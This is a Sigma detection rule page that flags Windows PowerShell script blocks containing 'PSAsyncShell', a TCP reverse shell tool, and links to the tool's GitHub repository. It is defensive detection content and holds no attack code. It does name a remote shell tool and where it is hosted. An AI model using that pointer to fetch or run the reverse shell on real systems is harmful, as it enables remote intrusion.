PSAsyncShell - Asynchronous TCP Reverse Shell
Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell
Sigma rule (View on GitHub)
1title: PSAsyncShell - Asynchronous TCP Reverse Shell
2id: afd3df04-948d-46f6-ae44-25966c44b97f
3status: test
4description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell
5references:
6 - https://github.com/JoelGMSec/PSAsyncShell
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2022-10-04
9tags:
10 - attack.execution
11 - attack.t1059.001
12logsource:
13 product: windows
14 category: ps_script
15 definition: 'Requirements: Script Block Logging must be enabled'
16detection:
17 selection:
18 ScriptBlockText|contains: 'PSAsyncShell'
19 condition: selection
20falsepositives:
21 - Unlikely
22level: high
References
-
PowerShell Asynchronous TCP Reverse Shell. Contribute to JoelGMSec/PSAsyncShell development by creating an account on GitHub.
Read More
Related rules
- AWS EC2 Startup Shell Script Change
- Alternate PowerShell Hosts - PowerShell Module
- Bad Opsec Powershell Code Artifacts
- BloodHound Collection Files
- Certificate Exported Via PowerShell